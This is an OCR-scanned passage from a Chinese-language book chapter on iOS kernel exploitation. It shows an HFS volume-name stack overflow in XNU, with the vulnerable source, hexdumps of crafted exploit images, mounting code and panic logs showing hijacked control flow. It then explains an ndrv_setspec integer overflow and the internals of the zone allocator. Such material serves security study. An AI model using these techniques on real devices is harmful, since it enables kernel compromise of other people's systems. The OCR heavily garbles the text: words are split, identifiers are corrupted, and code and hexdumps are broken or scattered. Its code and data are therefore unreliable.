限制 的 复制 和 转换 函数 。 针 对 该 漏洞 的 漏洞 攻击 程序 最 初 是 随 iOS 4.2.1 的 越狱 程序 一 同 发 布 的 。 
它 由 3 部 分 组 成 : 第 一 部 分 只 是 一 段 用 于 从 镜像 文件 挂 接 恶 意 HFS 文 件 系统 的 代码 ; 第 二 部 分 是 
触发 缓冲 区 溢出 的 恶意 镜像 本 身 ; 第 三 部 分 也 就 是 最 后 一 部 分 ,是 实际 的 有 效 载荷 代码 ,， 它 是 在 
漏洞 攻击 程序 要 返回 的 位 置 映射 的 。 

在 了 解 实际 的 漏洞 攻击 程序 前 ， 我 们 首先 看 看 有 漏洞 的 代码 。 作 为 XNU 内 核 代 码 的 一 部 分 ， 
它们 是 开源 的 ， 位 于 /bsd/hfshfs_ encoding.c 文 件 的 mac_roman_ to_unicode () 函数 中 : 
























































int 
mac_roman to unicode(const Str31 hfs_str, UniChar *uni_str, 
unused u int32 t maxCharLen, u int32 t 
*unicodeChars) 
{ 
const u_ int8_t *p; 
UniChar *u; 
U_int16 tt pascalChars; 
uw Tinte. tt es 


hts str 
uni_str; 


p 
u 


*unicodeChars = pascalChars = *(p++); /* 提取 长 度 字 节 */ 


while (pascalChars--) { 
CQ = *(p+t+); 


if ( (int8_t) c >= 0 ) { /* 检查 是 否 为 7 位 的 ascii */ 
*(ut++) = (UniChar) c; /* 用 0 填充 高 字 节 */ 
} else { /* its a hi bit character */ 
/* 和 */ 
} 
} 





return noRrr; 
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交 函数 有 一 些 很 有 趣 的 地 方 。 首 先 ， 调 用 该 函 
缓冲 区 中 可 以 容纳 的 最 大 字 节 数 。 大 家 还 会 看 到 ， 





该 函数 中 根本 没有 使 
被 认为 是 Pascal 格 式 的 ， 也 就 是 说 第 一 个 字 节 定义 了 字符 串 的 长 度 。 


数 时 有 一 个 参数 (maxcharLen ) 指定 了 输出 
用 过 这 个 参数 。 该 字符 串 
复制 和 转换 循环 会 完全 信任 











这 个 长 度 字 段 ， ee 写 缓冲 区 末端 的 检查 。 这 里 还 有 一 个 重点 ， 就 是 输出 字符 的 宽度 








是 16 位 ， 这 表示 每 隔 
符 会 由 严重 限制 可 能 








空间 中 ,并 因此 没 机 会 使 用 其 他 的 漏洞 攻击 方法 。 






































节 就 有 一 个 0。 唯 一 的 例外 就 是 那些 ASCII 值 大 于 127 的 字符 。 那 些 字 
俞 ! a 了 转换 。 具 体 的 代码 这 里 就 不 介绍 了 ， 因 为 它 对 于 漏洞 攻击 
程序 来 说 没什么 用 。 因为 每 隔 一 个 字 节 就 有 一 个 0, 所 以 这 里 





只 会 返回 到 用 户 空间 内 存 的 前 24 MB 


在 挂 接 HFS 镜 像 时 ， 对 mac_roman_to_unicode () 的 调用 来 源 于 函数 hfs_to_utf8()， 这 
个 函数 也 是 在 /bsd/hfs/hfs_encoding.c 文 件 中 定义 的 。 该 调用 是 通过 函数 指针 进行 的 。 
int 
hfs_to utf8(ExtendedVCB *vcb, const Str31 hfs_str, ByteCount maxDstLen, 
ByteCount *actualDstLen, unsigned char* dstsStr) 
{ 
int error; 
UniChar uniStr[MAX HFS_UNICODE CHARS]; 
ItemCount uniCount; 
size t utf8len; 
hfs to unicode func t hfs get unicode = VCBTOHFS(VvcCb)->hfs get unicode; 
error = hfs get unicode(hfs str, unistr, 
MAX_ HFS_ UNICODE CHARS, &uniCount); 
if (uniCount == 0) 
error = EINVAL; 
if (error == 0) { 
error = utf8_encodestr (unistr, uniCount * sizeof (UniChar), 
dstSstr, &utf8len, maxDstLen ， 2 
if (error == ENAMETOOLONG) 
*actualDstLen = utf8_encodelen(unistr, uniCount * 
sizeof (UniChar), 
.7 Os 
else 
*actualDstLen = utf8len; 
} 
return error; 
} 
现在 来 看 看 旧版 HFS 主 目录 头 部 的 定义 ， 它 存储 在 /bsd/hfs/hfs_format.h 文 件 中 ， 是 XNU 


源 代码 的 一 部 分 。 主 目录 块 被 存储 在 文件 系统 的 第 








第 二 个 遍 区 : 


/* HFS 主 目录 块 ，162 字 节 */ 
/* 存储 在 2 号 扇 区 (第 3 个 遍 区 ) 和 倒数 第 2 个 扇 区 中 */ 
struct HFSMasterDirectoryBlock { 

i Tint16. t drSigWord; 
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三 个 局 区 中 ， 而 它 的 副本 也 被 存储 在 倒数 


/* == kHFSSigWord */ 
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u_int32 上 ”drCrDate;  /* 创建 卷 的 日 期 和 时 间 */ 

u int32 t drLsMod; /* 最 近 一 次 修改 的 日 期 和 时 间 */ 
u_ int16 t drAtrb; /* 卷 属性 */ 

u_int16 t drNmFls; /* 根 文 件 夹 中 的 文件 数 */ 
u_int16_t drVBMSt; /* 卷 位 图 的 第 一 个 块 */ 

U_int16 七 drAllocPtr; /* 下 一 次 分 配 查找 的 起 始 */ 
u_int16 上 t ”drNmAlBlks; /* 卷 中 分 配 块 的 数量 */ 
u_int32_t ”drAlBlkSiz; /* 分 配 块 的 大 小 (单位 为 字 节 )  */ 
u_int32_t drClpSiz; /* 默认 族 大 小 */ 

u_int16_t drAlBlSt; /* 卷 中 第 一 个 分 配 块 */ 
Uu_int32_t ”drNxtCNID; /* 下 一 个 未 使 用 的 编目 节点 ID */ 
u_int16_t drFreeBks; /* 未 使 用 分 配 块 的 数量 */ 

u int8 七 drVvN[kHFSMaxVolumeNameChars + 1]; /* 卷 名 */ 
这 三 开交 二 3 2 二 drVolBkUp;  /* 最 近 一 次 备份 的 日 期 和 时 间 */ 
u_int16 上 drVSeqNum; /* 卷 备 份 的 序号 */ 


大 家 可 以 看 到 ， 在 原始 定义 中 卷 名 最 多 可 以 有 kHFSMaxVolumeNameChars 个 字符 。 源 代码 
将 该 常量 定义 为 27。 但 代码 又 没有 对 这 个 字段 进行 任何 限制 , 因此 超 长 的 卷 名 就 有 可 能 传人 并 被 
传送 到 Unicode 转 换 函 数 。 有 了 这 些 信 息 ， 现 在 可 以 创建 触发 溢出 的 恶意 HFS 镜 像 了 : 


$ hexdump -C exploit.hfs 

00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................ 
火 
00000400 42 44 00 00 00 00 00 00 00 00 01 00 00 00 00 00 |BD.............. 
00000410 "00 ‘00 00 00 00 00 02 00 00 00 00 ‘00 00 00 00 00 | .00 
00000420 00 00 00 00 60 41 41 41 41 42 42 42 42 43 43 43 |....`.AAAABBBBCCC 
00000430 43 44 44 44 44 45 45 45 45 46 46 46 46 47 47 47 |CDDDDEEEEFFFFGGG 
00000440 47 48 48 48 48 49 49 49 49 4a 4a 4a 4a 4b 4b 4b |GHHHHIIIIUJJUKKK 
00000450 4b 4c 4c 4c 4c 4d 4d 4d 4d 4e 4e 4e 4e 4f 4f 4f |KLLLLMMMMNNNNOOO 
00000460 4f 50 50 50 50 51 51 51 51 52 52 52 52 53 53 53 |0PPPPQOQQQRRRRSSS 
00000470 53 54 54 54 54 55 55 55 55 56 56 56 56 57 57 57 |STTTTUUUUVVVVWWW 
00000480 57 58 58 58 58 00 00 00 00 00 00 00 00 00 00 00 | EXR ,ss 
oo0000290. :100 007.00.00. 10 00 .00.700 00. 00 00-00 00 .00 .000-00 | 人 


党 


00000600 
该 HFS 镜 像 包含 有 长 达 96 字 节 的 超 长 卷 名 , 在 这 里 的 情况 下 应 该 能 让 缓冲 区 液 出。 因为 卷 名 
是 由 字母 表 中 的 真实 字母 组 成 的 ， 所 以 Unicode 转 换 应 该 会 把 所 有 的 内 容 变 成 非法 内 存 地 址 ， 这 
增加 了 系统 崩溃 的 可 能 性 。 要 挂 接 这 个 HFS 镜 像 ， 大 家 要 用 到 /dev/vn0 设 备 : 


int ret, fd; struct vn_ ioctl vn; struct hfs_ mount _ args args; 


























fd = open("/dev/vn0", O_RDONLY, 0); 

时下， ( 主 尖 00) 持 
puts("Can't open /dev/vn0 special file."); 
Eit (1)y 

} 


memset (&vn, 0, sizeof (vn)); 
ioctl (fd, VNIOCDETACH, &vn); 
vn.vn_file = "/usr/lib/exploit.hfs"; 
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vn.vn_control = vncontrol readwrite io_e; 
ret = ioctl(fd, VNIOCATTACH, &vn); 


close(fd); 
if (ret < 0) { 


puts("Can't: attach v0 Ty 


exit (1); 
} 


memset (&args, 0, sizeof (args)); 
args.fspec = "/dev/vn0"; 
args.hfs uid = args.hfs gid 


args.hfs_ mask = 0xlc5; 


ret = mount( hfsr,; /mty/™, 


= 99; 


MNT_RDONLY, &args); 


如 果 在 运行 有 漏洞 的 内 核 时 尝试 挂 接 之 前 构造 的 HFS 镜 像 ， 这 会 立即 导致 内 核 严 重 错误 。 大 
家 可 以 分 析 一 下 崩 演 转 储 文件 ， 看 看 都 发 生 了 什么 : 


Hardware Model: iPod4,1 
Date/Time: 2011-07-26 09:55:12.761 +0200 
OS Version: iPhone OS 4.2.1 (8C148) 


kernel abort type 4: fault_ type=0x3, fault_addr=0x570057 

r0: Ox00000041 1: 0x00000000 r2: 0x00000000 r3: Ox000000ff 
r4: Ox00570057 r5: 0x00540053 r6: 0x00570155 r7: Oxcdbfb720 
r8: Oxcdbfb738 r9: 0x00000000 r10: 0x0000003a r11: 0x00000000 
12: 0x00000000 sp: Oxcdbfb6e0 lr: 0x8011c47f pc: 0x8009006a 


cpsr: 0x80000033 fsr: 


正如 大 家 所 见 ， 严 重 错误 是 由 


的 。 大 家 还 会 看 到 ，R4 、R5 和 1 





0x00000805 far: 0x00570057 


也 址 0x570057 (等 于 R4 寄 存 器 的 值 ) 处 的 无 效 内 存 访问 引起 





R6 都 是 由 缓冲 区 溢出 控制 的 。 不 过 ,大 家 没 法 控制 程序 计数 需 PC， 


此 应 该 看 看 Pc 以 及 LR 附近 的 代码 : 


80090066 
80090068 
8009006A 
8009006A loc_ 8009006A 
8009006A 
8009006E 





CMP 
BCS 


R4, R6 
loc_ 80090120 


; CODE XREF: _Uutf8_ encodestr+192 
STRB.W RO, [R4] ,#1 


B 











loc_8008FFD6 


不 出 所 料 ，Pc 处 的 指令 试 着 向 R4 写 数据 ， 因 此 引发 了 内 核 严 重 错误 。 大 家 还 会 发 现 已 经 执 
行 到 函数 utf8_encodestr () 中 ,而 这 不 是 大 家 最 终 想 要 到 达 的 地 方 。 通 过 检查 LR 附近 的 代码 ， 
大 家 可 以 看 到 期 望 的 源 自 nfs_to_utf8() 的 调用 : 


8011C476 
8011C478 
8011C47A 
8011C47E 
8011C480 








MOVS 
STR 
BL 
CMP 
MOV 



































R5, #0x3A 

R5, [SP,#0xB8+var_B4] 
_utf8_encodestr 

RO, #0x3F 

R4, RO 


大 家 根据 源 代码 就 会 知道 , 只 有 在 变量 unicount 非 0 的 情况 下 才能 到 达 这 一 代码 路 径 。 缓冲 
区 溢出 重 写 了 该 变量 ， 因 此 大 家 可 以 调整 自己 的 有 效 载荷 ， 为 其 装 入 值 0。 发 生 溢出 时 的 栈 布局 











如 图 9-6 所 示 。 
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在 查看 栈 布局 之 后 ， 如 果 想 要 预 设 nicount 、R4~R7 寄 存 器 以 及 程序 计数 器 Pc 的 值 ， 大 家 


图 9-6 


就 会 知道 要 修改 有 效 载 集 中 的 哪些 字 方 ; 


$ hexdump 
00000000 
火 

00000400 
00000410 
00000420 
00000430 
00000440 
00000450 
00000460 
00000470 
00000480 
00000490 


大 


00000600 


-C exploit_ improved.hfs 
00 00 00 00 00 00 00 00 


42 
00 
00 
58 
58 
58 
58 
58 
47 
00 


44 
00 
00 
58 
58 
58 
58 
58 
47 
00 


00 
00 
00 
58 
58 
58 
58 
00 
48 
00 


00 
00 
00 
58 
58 
58 
58 
00 
48 
00 


00 
00 
60 
58 
58 
58 
58 
41 
58 
00 


00 
00 
58 
58 
58 
58 
58 
41 
00 
00 


00 
02 
58 
58 
58 
58 
58 
42 
00 
00 


00 
00 
58 
58 
58 
58 
58 
42 
00 
00 


uniCount 


/NN 
utf8len 


rN 


uniStr 
75*2 字 节 








、 J/ 
溢出 发 生 时 的 栈 布局 


00 


00 
00 
58 
58 
58 
58 
58 
43 
00 
00 


00 


00 
00 
58 
58 
58 
58 
58 
43 
00 
00 





00 


01 
00 
58 
58 
58 
58 
58 
44 
00 
00 


版 权 
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00 


00 
00 
58 
58 
58 
58 
58 
44 
00 
00 


00 


00 
00 
58 
58 
58 
58 
58 
45 
00 
00 


00 


00 
00 
58 
58 
58 
58 
58 
45 
00 
00 


00 


00 
00 
58 
58 
58 
58 
58 
46 
00 
00 


00 








.... XXXXXXXXXXX 
XXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXX 
XXXXXXXXXXXXXXXX 
XX. .AABBCCDDEEFF 
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现在 , 在 再 次 挂 接 新 文件 之 后 ,我们 就 可 以 对 生成 的 严重 错误 日 志 进 行 分 析 , 验证 自己 的 假 
设 是 否 正 确 。 事 实 上 ,大 家 会 看 到 所 有 的 寄存 器 都 装 入 了 预期 的 值 。 除 此 之 外 ,大 家 还 会 发 现 严 
重 错误 是 由 于 CPU 试图 读 取 0x450044 处 的 下 一 条 指令 造成 的 , 这 表示 大 家 成 功 地 劫持 了 代码 流 : 








Hardware Model : iPod4,1 
Date/Time: 2011-07-26 11:05:23.612 +0200 
OS Version: iPhone OS 4.2.1 (8C148) 


sleh abort: prefetch abort in kernel mode: fault addr=0x450044 
r0: Ox00000016 rl1l: 0x00000000 r2: 0x00000058 rr3: Oxcdbf37d0 
r4: Ox00410041 r5: 0x00420042 r6: 0x00430043 r7: 0x00440044 
r8: 0x8a3ee804 r9: 0x00000000 r10: 0x81p44250 r11: 0xc07c7000 
12: 0x89640c88 sp: Oxcdbf37e8 lr: 0x8011c457 pc: 0x00450044 
cpsr: 0x20000033 fsr: 0x00000005 far: 0x00450044 


在 漏洞 攻击 程序 的 最 后 ， 大 家 需要 利用 mmap () 把 一 些 shellcode 代 码 从 用 户 空间 映射 到 地 址 
0x450044 人 处 ,或 者 修改 HFS 镜 像 ， 使 其 返回 大 家 的 shellcode 代 码 已 经 映射 到 的 某 个 地 址 。 


9.4.4 内核 堆 缓冲 区 溢出 


之 所 以 会 出 现 内 核 级 的 堆 缓冲 区 溢出 漏洞 , 这 是 因为 向 基于 堆 的 缓冲 区 进行 了 不 加 限制 的 复 
制 操作 。 这 种 溢出 的 结果 取决 于 实际 的 堆 实 现 以 及 附近 的 内 存 块 , 它们 决定 了 这 样 的 溢出 能 和 否 用 
于 漏洞 攻击 、 允 许 任意 的 代码 执行 或 受 控 制 的 内 存 损坏 。 与 内 核 空 间 缺 乏 针对 栈 缓冲 区 溢出 的 保 
护 措施 相似 ，iOS 内 核 中 也 没有 针对 堆 缓 冲 区 洪 出 的 保护 措施 。 针 对 堆 缓冲 区 溢出 的 全 面 漏洞 攻 
击 要 比 之 前 讨论 过 的 几 类 问题 复杂 得 多 , 要 求 大 家 很 好 地 理解 堆 分 配 程 序 的 实现 。 在 开始 介绍 实 
际 的 漏洞 攻击 之 前 ， 我 们 首先 看 一 下 为 :OS 4.3.1 到 4.3.3 越 狱 的 redsn0w 工 具 所 利用 的 漏洞 。 

要 讨论 的 漏洞 位 于 ndrv_setspec () 函数 中 ,该 函数 是 在 /bsdnetndrv.c 文 件 中 定义 的 。 实 际 
漏洞 并 不 是 简单 的 堆 缓冲 区 溢出 , 而 是 在 计算 所 分 配 堆 内 存 数量 的 乘法 中 发 生 的 整数 溢出 。 因 为 
没有 检查 用 户 提 供 的 demux_count， 所 以 32 位 的 变量 不 一 定 能 容纳 乘法 的 结果 ， 因 此 分 配 返 回 
了 一 个 过 小 的 缓冲 区 ， 如 下 面 的 代码 所 示 : 


bzero(&proto param, sizeof (proto_ param)); 
proto_param.demux_ count = ndrvSpec.demux_count; 




































































/* 为 解 复 用 数组 分 配 存 储 空间 */ 
MALLOC (ndrvDemux, struct ndrv demux desc*, proto param.demux count * 
sizeof(struct ndrv demux desc), M TEMP, M WAITOK); 
if (ndrvDemux == NULL) 
return ENOMEM; 











/* 分 配 足 够 的 ifnet_demux_descs */ 
MALLOC (proto param.demux array, struct ifnet demux desc*, 
sizeof (*proto param.demux array) * ndrvSpec.demux count, 
M TEMP, M WAITOK); 
if (proto_ param.demux array == NULL) 
error = ENOMEM; 
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如 果 demux_count 被 置 为 0x4000000a 这 样 的 值 ,那么 两 个 对 _MALLoc () 的 调用 都 包含 了 会 
溢出 的 整数 乘法 。 因 此 ， 两 个 缓冲 区 对 于 所 提供 的 aemux_count 来 说 都 不 够 长 。 函 数 会 继续 从 
用 户 空 间 把 数据 复制 到 narvDemux 缓 冲 区 。 不 过 , 因为 复制 的 量 是 由 相同 公式 计算 的 , 所 以 这 不 
会 导致 缓冲 区 溢出 ， 因 为 如 同 大 家 在 这 里 要 看 到 的 ， 我 们 只 复制 了 相同 数量 的 字 节 : 

/* 从 用 户 空间 复制 这 个 ndrv 解 复 用 数组 */ 

error = copyin(user_addr, ndrvDemux, ndrvSpec.demux_ count * 


sizeof (struct ndrv_demux_ desc)); 
ndrvSpec.demux_list = ndrvDemux; 


实际 的 绥 冲 区 溢出 隐藏 在 一 个 循环 中 , 该 循环 负责 转换 从 用 户 空间 传人 内 核 结构 的 数据 , 它 
就 紧 跟 在 这 一 复制 操作 之 后 : 


proto_param.demux_count = ndrvSpec.demux_count; 




















proto_param.input = ndrv_input; 
proto_param.event = ndrv_event; 


for (demuxOn = 0; demuxOn < ndrvSpec.demux_ count; demuxOn++) 
{ 
/* 将 ndrv_demux_desc 转 换 成 ifnet_demux_desc */ 
error = ndrv_to_ ifnet demux(&ndrvSpec.demux_ list[demuxOn], 
&proto_param.demux_array [demuxOn] ); 
if (error) 
break; 


} 

大 家 可 以 看 到 ， 这 个 循环 将 会 持续 转换 ， 直 到 所 有 的 内 容 转 换 完毕 或 是 触发 了 错误 。 大 家 的 
选择 应 该 很 明显 ,就 是 要 通过 某 种 手段 触发 该 错误 , 因为 不 这 样 的 话 复制 的 字符 量 就 会 过 大 并 导 
致 内 核 崩 演 。 在 了 解 转 换 函 数 ndrv_to_ifnet_demux() 时 大 家 就 会 明白 , 这 不 是 个 问题 ,不 过 
在 开始 着 手 之 前 ， 先 来 看 看 内 核 堆 的 实现 。 

1. 内 核 堆 内 存 域 分 配 程 序 

要 理解 内 核 堆 中 的 缓冲 区 溢出 是 怎样 导致 漏洞 攻击 的 ， 我 们 就 必须 了 解 内 核 堆 的 实现 。iOS 
内 核 中 存在 多 种 内 核 堆 的 实现 , 不 过 我 们 只 讨论 被 分 析 得 最 多 的 一 种 。 我 们 要 剖析 的 分 配 程序 叫 
作 内 存 域 分 配 程序 ( zone allocator )， 它 是 iOS 中 最 常用 的 分 配 程序 ， 是 在 osfmkykern/zalloc.c 文 件 
中 定义 的 ， 并 且 要 通过 zalloc() 、zalloc_canblock() 和 zfree() 函数 来 使 用 。 在 很 多 情况 
下 ， 我 们 并 不 会 直接 使 用 它 ， 而 是 通过 包装 函数 使 用 它 。 最 常见 的 用 法 是 利用 _MArLoc () 函数 ， 
该 函数 会 调用 kalloc () 进行 实际 的 分 配 。kalloc () 包 装 了 两 种 不 同 的 分 配 程序 , 并 会 根据 分 配 
的 块 的 大 小 在 二 者 之 间作 出 选择 。 较 小 的 块 是 通过 zalloc() 分 配 的 ， 而 较 大 的 块 是 通过 
knem_alloc () 了 艺 数 分 配 的 。 

在 对 内 存 域 分 配 程序 的 实际 实现 进行 分 析 之 前 , 我 们 先 来 看 看 这 些 包 装 函 数 ,因为 它们 本 身 
就 已 经 很 吸引 人 了 了。_MALLOC () 函数 是 在 /bsd/kern/kern_malloc.c 文 件 中 定义 的 。 之 所 以 说 它 很 特 
别 ,是 因为 它 会 给 所 分 配 的 数据 加 上 一 个 包含 有 块 大 小 信息 的 头 部 。 这 是 有 必要 的 ， 因 为 它 内 部 
使 用 了 kalloc() 和 kfree () 函数 ， 而 这 两 者 都 需要 获取 所 传递 块 的 大 小 。 
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Void * 

_MALLOC( 
size t size, 
Lt type, 
I flags) 


struct _mhead *hdr; 
size 七 memsize = sizeof (*hdr) + size; 


If (type >= M_ LAST) 
panic(" malloc TYPE"); 





if (size == 0) 
return (NULL); 


if (flags & M NOWAIT) { 

hdr = (void *)kalloc noblock (memsize); 
} else { 

hdr = (void *)kalloc (memsize); 


if ‘(hdr ==. NUEE) 1{ 
panic(" MALLOC: kalloc returned NULL (potential leak), size %llu", 
(uint64 t) size); 





} 


if (!hdr) 
return (0); 


hdr->mlen = memsize; 


if (flags & M ZERO) 
bzero(hdr->dat, size); 





return (hdr->dat); 
} 


该 函数 最 有 意思 的 地 方 莫 过 于 分 配 中 可 能 存在 的 整数 洪 出 ， 只 要 分 配 0xFFFFFFFC 或 更 多 字 
节 就 会 触发 溢出 。 ee te 不 过 苹果 公司 已 经 在 iOS 5.0 中 悄 无 
声息 地 修复 了 该 漏洞 。 现 在 的 _MaALLoc () 会 检测 可 能 的 整数 游 出 ， 并 根据 M_NOWaIT 标 志 返 回 

NULL 或 严重 错误 。 

不 过 ，_MALLOC () 只 是 kalloc () 外 的 一 层 包装 而 已 ， 而 kalloc () 要 稍微 复杂 一 些 ， 因 
为 它 包 装着 两 个 不 同 的 内 核 堆 分 配 程序 。kalloc () 是 在 /osfmkykern/kern_alloc.c 文 件 中 定义 
的 。 这 里 只 展示 了 涉及 内 存 域 分 配 程序 的 相关 部 分 ， 因 为 还 没有 对 kmem_alloc () 分 配 程序 进 
行 过 分 析 。 

Void * 

kalloc_ canblock( 


vm_size _t size, 
boolean t canblock) 



























































register int zindex; 
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register vm size t allocsize; 
vm map_t alloc map = VM MAP_NULL; 


/大 
* 如 果 大 小 远 超 内 存 域 的 大 小 ， 就 使 用 kmem_alloc 
* 


if (size >= kalloc max prerounded) { 
} 

/* 计算 我 们 实际 要 分 配 的 块 的 大 小 */ 
allocsize = KALLOC MINSIZE; 

zindex = first_k zone; 


while (allocsize < size) { 
allocsize <<= 1; 





Zindext++; 


} 


/* 从 合适 的 内 存 域 中 分 配 */ 
assert(allocsize < kalloc max); 
return(zalloc canblock(k_zone[zindex], canblock)); 


} 

在 iOS 4 中 , kalloc () 注 册 了 大 小 为 从 16 到 8192 所 有 2 的 乘 方 的 不 同 内 存 域 。 从 iOS 5.0 开 始 ， 
该 函数 除 这 些 大 小 的 内 存 域外 还 注册 了 大 小 为 24、40、48、88、112、192、384、786、1536、 
3072 和 6144 的 内 存 域 。 人 们 认为 ， 之 所 以 添加 这 些 内 存 域 是 因为 它们 代表 了 一 些 常 被 请 求 的 内 
存 域 大 小 。 在 分 配 内 存 时 ， 我 们 会 将 其 分 配 进 大 小 适合 的 最 小 内 存 域 中 。 这 表示 对 于 iOS 4 而 言 ， 
大 小 为 513 的 内 存 块 最 后 会 被 放 人 1024 字 节 的 内 存 域 , 而 对 于 iOS 5 来 说 它 会 被 放 进 786 字 节 的 内 
存 域 。 

在 剥 开 这 层 层 包装 之 后 , 最 后 就 到 达 了 内 存 域 分 配 程序 的 核心 部 分 , 我 们 可 以 分 析 它 的 内 部 
实现 了 。 之 所 以 要 把 这 种 分 配 程序 叫 作 内 存 域 分 配 程序 , 是 因为 它 是 以 内 存 域 为 单位 组 织 内 存 的 。 
在 内 存 域 中 , 所 有 的 内 存 块 大 小 都 相同 。 对 于 多 数 内 核对 象 来 说 ， 甚 至 有 专门 的 内 存 域 用 来 收集 
具有 相同 结构 类 型 的 内 存 块 。 这 样 的 内 存 域 包括 socket 、tasks、vnodes 和 kernel_stacks。 
其 他 的 通用 内 存 域 ， 比 如 由 kalloc () 注册 的 那些 ， 则 是 用 kalloc.16 到 kalloc.8192 表 示 的 。 
在 iOS 和 Mac OS X 中 ， 大 家 可 以 使 用 /usr/bin/zprint 工 具 检索 完整 的 内 存 域 列表 。 内 存 域 是 
由 它 的 zone 结构 体 描述 的 : 


struct zone { 
































int count; /* 现在 使 用 的 元 素数 */ 
vm_offset_ tt free elements; 

decl_lck mtx_aqata(,1ock) /* 内 存 域 锁 */ 
1ck_mtx_ext_t lock_ ext; /* 间接 复 用 的 占 位 符 */ 
lck_attr_t lock attr; /* 内 存 域 锁 属 性 */ 
lck_grp_t lock_grp; /* 内 存 域 锁 群 组 */ 
lck_grp_attr t lock grp_attr; /* 内 存 域 锁 群 组 属性 */ 
vm size t cur size; /* 当前 的 内 存 占用 率 */ 
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vm_size t max size; /* 该 内 存 域 可 以 增长 到 多 大 */ 
vm_size t elem size; /* 元 素 的 大 小 */ 
vm_size t alloc size; /* 要 分 配 的 更 多 内 存 的 大 小 */ 
uint64 t sum count; /* 分 配 的 计数 (内 存 域 的 寿命 ) */ 
unsigned int 

/* boolean t */ exhaustible :1, /* (F) ”如 果 为 空 是 否 只 是 返回 ? */ 
/* boolean t */ collectable :1, /* (F) 是 否 对 空 内 存 页 进行 垃圾 收集 ? */ 
/* boolean t */ expandable :1, /* (T) 是 否 (用 消息 ) 扩展 内 存 域 ? */ 
/* boolean t */ allows_ foreign :1, /* (F) 是 否 允 许 非 zalloc 空 间 ? */ 
/* boolean t */ doing_alloc :1, /* 是 否 现 在 扩展 内 存 域 ? */ 
/* boolean t */ waiting :1, /* 线程 是 否 在 等 待 扩 展 ? */ 
/* boolean t */ async_pending :1, /* 是 否决 定 进 行 异 步 分 配 ? */ 
/* boolean t */ caller acct: 1, /* 是 否 将 分 配 /释放 归结 为 调用 函数 ? */ 
/* boolean t */ doing_ gc :1, /* 是 否 正 在 进行 垃圾 收集 */ 
/* boolean t */ noencrypt :1; 

int index; /* 该 内 存 域 对 应 的 Zone_info 数 组 的 索引 */ 
struct zone * next_zone; /* 内 存 域 链表 的 链接 */ 
call_entry_data t call async alloc; /* 异步 分 配 的 调 出 */ 
const char *zone_ name; /* 内 存 域 的 名 称 */ 


了 

所 有 内 存 域 都 被 保存 在 一 个 单 向 链表 中 , 该 链表 中 的 元 素 都 是 通过 next_zone 指 针 连 接 到 下 
一 个 元 素 的 。 内 存 域 会 记录 当前 已 分 配 元 素 的 数量 以 及 当前 已 分 配 内 存 的 量 , 而 它 不 会 记录 属于 
该 内 存 域 的 各 内 存 页 的 地 址 。 除 此 之 外 , 一 系列 的 字段 包含 了 内 存 域 的 配置 : 元 素 的 大 小 、 内 存 
域 的 最 大 大 小 , 以 及 内 存 域 装 满 时 增长 的 内 存量 。 该 结构 体 中 的 位 字段 还 配置 了 内 存 域 是 否 支持 
垃圾 收集 、 是 否 禁 用 自动 增长 或 者 是 否 免 于 加 密 。 

该 结构 体 中 的 Eree_elements 指 针 表明 ， 内 存 域 中 所 有 的 自由 元 素 都 是 保存 在 一 个 链表 中 
的 。 指 向 自由 列表 下 一 个 元 素 的 连接 指针 存储 在 自由 块 的 开头 位 置 。 在 分 配 内 存 时 ， 自 由 列表 的 
第 一 个 元 素 会 被 重用 ， 而 且 自 由 列表 的 表 头 会 被 下 一 个 元 素 替 代 。 如 果 自 由 列表 为 空 ,那么 内 存 
域 会 被 扩大 。 在 向 内 存 域 添加 内 存 页 或 是 初次 创建 内 存 域 时 , 新 的 内 存 块 会 被 一 个 接 一 个 放 入 自 
由 列表 。 因 此 ， 自 由 列表 中 某 内 存 页 的 各 内 存 块 是 反 向 排列 的 。 

在 用 zalloc () 分 配 元 素 时 ， 我 们 是 利用 REMOVE_FROM_ZONE 宏 从 自由 列表 中 取出 元 素 的 。 
该 宏 会 从 自由 内 存 块 的 开头 读 取 指 向 自由 列表 下 一 个 元 素 的 指针 ， 将 其 置 为 自由 列表 的 新 表 头 ， 
并 返回 自由 列表 之 前 的 表 头 作为 所 分 配 的 内 存 块 : 







































































#define REMOVE_ FROM ZONE (zone, ret, type) 
MACRO_BEGIN 
(ret) = (type) (zone)->free_ elements; 
if ((ret) != (type) 0) { 


if (check_ freed element) { 
if (!is_ kernel data addr(((vm offset t *) (ret))[0]) || 
( (zone)->elem size >= (2 * sizeof (vm offset t)) && 
((vm_offset tt *) (ret))[((zone)->elem size/sizeof (vm offset _t))-1] 
!= ((vm offset _t *) (ret))[0])) 

panic("a freed zone element has been modified"); 

if (zfree clear) { 
unsigned int ii; 
for (ii = sizeof (vm offset_t) / sizeof (uint32_t); 
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ii < (zone)->elem size/sizeof (uint32_t) \ 

- sizeof (vm_offset_t) / sizeof (uint32_t); ii++) N 

if (((uint32_t *) (ret))[ii] != (uint32_t)0xdeadbeef) \ 

panic("a freed zone element has been modifi ed"); SN 

} \ 

} 党 

(Zone) ->count++; N 

(zone) ->sum_count++; \ 

(zone) ->free _ elements = *((vm offset t *) (ret)); 

} \ 
MACRO_END 





这 个 宏 的 大 部 分 在 执行 对 自由 元 素 和 自由 列表 的 检查 。 这 些 检查 是 为 了 检测 内 核 堆 损坏 而 执 
行 的 , 不 过 它们 是 有 条 件 执行 而 且 默 认 状 态 是 未 激活 的 。 要 激活 它们 , 我 们 必须 使 用 特殊 的 引导 
参数 -zc 和 -zp 引导 iOS 内 核 。 从 Mac OS X Lion 最 新 的 源 代 码 可 知 ， 苹 果 公司 似 乎 在 试验 默认 激 
活 这 些 功 能 。 不 过 现在 它们 仍然 是 未 激活 的 ， 这 最 可 能 是 因为 性 能 的 缘故 。 

因为 默认 情况 下 iOS 内 核 中 没有 激活 任何 安全 检查 ， 而 且 自 由 列表 是 存储 入 站 的 ， 所 以 iOS 
内 核 中 的 堆 溢 出 漏洞 攻击 与 其 他 平台 上 多 年 前 受过 的 攻击 非常 类 似 。 通 过 溢出 已 分 配 内 存 块 的 结 
尾 进 入 邻接 的 自由 块 , 这 样 就 有 可 能 重 写 这 个 自由 块 并 因此 蔡 换 掉 指 向 自由 列表 中 下 一 个 元 素 的 

间 针 。 当 被 重 写 的 自由 块 随后 成 为 自由 列表 的 表 头 时 ， 下 一 次 对 zalloc () 的 调用 就 会 返回 它 并 
